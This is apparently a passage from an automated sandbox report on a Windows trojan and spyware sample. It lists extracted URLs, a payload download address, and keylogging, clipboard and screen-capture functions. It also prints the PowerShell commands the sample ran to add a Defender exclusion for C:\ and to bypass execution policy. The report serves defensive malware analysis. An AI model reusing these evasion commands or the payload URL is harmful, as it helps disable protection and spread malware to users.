                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: powershell.exe, 00000003.00000002.1706524566.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1762406995.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1795405452.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://s.symcd.com06
                      Source: powershell.exe, 00000013.00000002.2028829277.0000000006FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000005016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.0000000004271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000005016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: leBwnyHIgx.exe, leBwnyHIgx.exe.0.drString found in binary or memory: http://www.innosetup.com/
                      Source: leBwnyHIgx.exe, leBwnyHIgx.exe.0.drString found in binary or memory: http://www.remobjects.com/ps
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.0000000004271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBtq
                      Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: leBwnyHIgx.exe, leBwnyHIgx.exe.0.drString found in binary or memory: https://code.visualstudio.com/0
                      Source: powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000005311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.000000000581D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000003.00000002.1706524566.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1762406995.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1795405452.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/
                      Source: leBwnyHIgx.exe, 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exe
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exeX
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exec
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exex
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownHTTPS traffic detected: 47.79.48.230:443 -> 192.168.2.4:49732 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to capture and log keystrokes
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: [esc]5_2_0307E850
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: [esc]5_2_0307E850
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: [esc]5_2_0307E850
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: [esc]5_2_0307E850
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,5_2_0307E850
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,5_2_0307E850
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,5_2_0307BC70
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,5_2_0307E4F0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00CD18A7 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,0_2_00CD18A7
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00D918A7 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,5_2_00D918A7
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_005FA9A8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,5_2_005FA9A8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307B41B ExitWindowsEx,5_2_0307B41B
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307B43F ExitWindowsEx,5_2_0307B43F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307B463 ExitWindowsEx,5_2_0307B463
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0064F1DC0_2_0064F1DC
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0040AC840_2_0040AC84
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_100167210_2_10016721
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00CD00320_2_00CD0032
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00CE66F80_2_00CE66F8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04A0B4903_2_04A0B490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04A0B4703_2_04A0B470
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0064F1DC5_2_0064F1DC
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0040AC845_2_0040AC84
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03076EE05_2_03076EE0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03076C505_2_03076C50
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308E3415_2_0308E341
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_030883815_2_03088381
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_030724B05_2_030724B0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308EA1D5_2_0308EA1D
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_030789005_2_03078900
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308F9FF5_2_0308F9FF
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308D89F5_2_0308D89F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0308DDF05_2_0308DDF0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0272122F5_2_0272122F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0271B66A5_2_0271B66A
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_027217805_2_02721780
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_027124B05_2_027124B0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02721E5C5_2_02721E5C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02720CDE5_2_02720CDE
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02722D915_2_02722D91
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_100167215_2_10016721
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00D900325_2_00D90032
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00DA66F85_2_00DA66F8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026C00325_2_026C0032
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026D12065_2_026D1206
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026CB6415_2_026CB641
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026D17575_2_026D1757
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026D0CB55_2_026D0CB5
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026C24875_2_026C2487
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_026D2D685_2_026D2D68
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02EF82BF5_2_02EF82BF
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02F0D25E5_2_02F0D25E
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02F0F3BE5_2_02F0F3BE
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02EF689F5_2_02EF689F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02EF1E6F5_2_02EF1E6F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02EF660F5_2_02EF660F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02F0D7AF5_2_02F0D7AF
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02F07D405_2_02F07D40
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_02F0DD005_2_02F0DD00
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Downloads\wpsv.5.6.3.exe C6AC7D9ADD40B913112B265D4F366D9EF80BBD711049DB085FC750FCAD4E14D8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: String function: 005C94E0 appears 40 times
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: String function: 005E0B90 appears 60 times
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: String function: 005E08AC appears 46 times
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: String function: 03084300 appears 32 times
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: String function: 005E0B90 appears 60 times
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: String function: 005C94E0 appears 40 times
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: String function: 005E08AC appears 46 times
                      Source: leBwnyHIgx.exe, 00000000.00000000.1657771308.0000000000672000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077897111.000000000245A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000000.00000003.1717834094.0000000002970000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000005.00000002.4133552323.000000000268A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exeBinary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe.0.drBinary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/27@1/2
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_005FA9A8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,5_2_005FA9A8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03077740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_03077740
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03077620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,5_2_03077620
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03077B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,5_2_03077B70
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03076C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,5_2_03076C50
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_10001FA0 CreateToolhelp32Snapshot,memset,Process32FirstW,WideCharToMultiByte,CloseHandle,Process32NextW,CloseHandle,0_2_10001FA0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0060F338 GetVersion,CoCreateInstance,0_2_0060F338
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0046523C FindResourceW,LoadResource,SizeofResource,LockResource,0_2_0046523C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.25
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeMutant created: \Sessions\1\BaseNamedObjects\VJANCAVESU
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile created: C:\Users\user\AppData\Local\Temp\PolicyManagement.xmlJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: leBwnyHIgx.exeVirustotal: Detection: 29%
                      Source: leBwnyHIgx.exeReversingLabs: Detection: 23%
                      Source: leBwnyHIgx.exeString found in binary or memory: /LoadInf=
                      Source: leBwnyHIgx.exeString found in binary or memory: /LoadInf=
                      Source: leBwnyHIgx.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
                      Source: leBwnyHIgx.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
                      Source: leBwnyHIgx.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
                      Source: leBwnyHIgx.exeString found in binary or memory: /LoadInf=
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile read: C:\Users\user\Desktop\leBwnyHIgx.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\leBwnyHIgx.exe "C:\Users\user\Desktop\leBwnyHIgx.exe"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
